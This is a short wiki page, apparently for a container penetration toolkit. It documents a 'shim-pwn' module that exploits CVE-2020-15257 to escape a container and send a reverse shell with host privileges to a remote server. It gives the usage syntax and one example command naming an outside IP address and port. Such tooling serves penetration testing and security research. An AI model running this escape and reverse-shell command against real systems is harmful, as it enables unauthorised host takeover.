Skip to content

Exploit: shim pwn

cdxy edited this page Dec 14, 2020 · 3 revisions

Exploit: ak-leakage

自动化逃逸CVE-2020-15257,反弹宿主机的shell到远端服务器。

Automatic exploit CVE-2020-15257, spawn a reverse shell with host privilege to remote server.

Usage

./cdk run shim-pwn <RHOST> <RPORT>

Example

./cdk run shim-pwn 47.104.151.168 111

Clone this wiki locally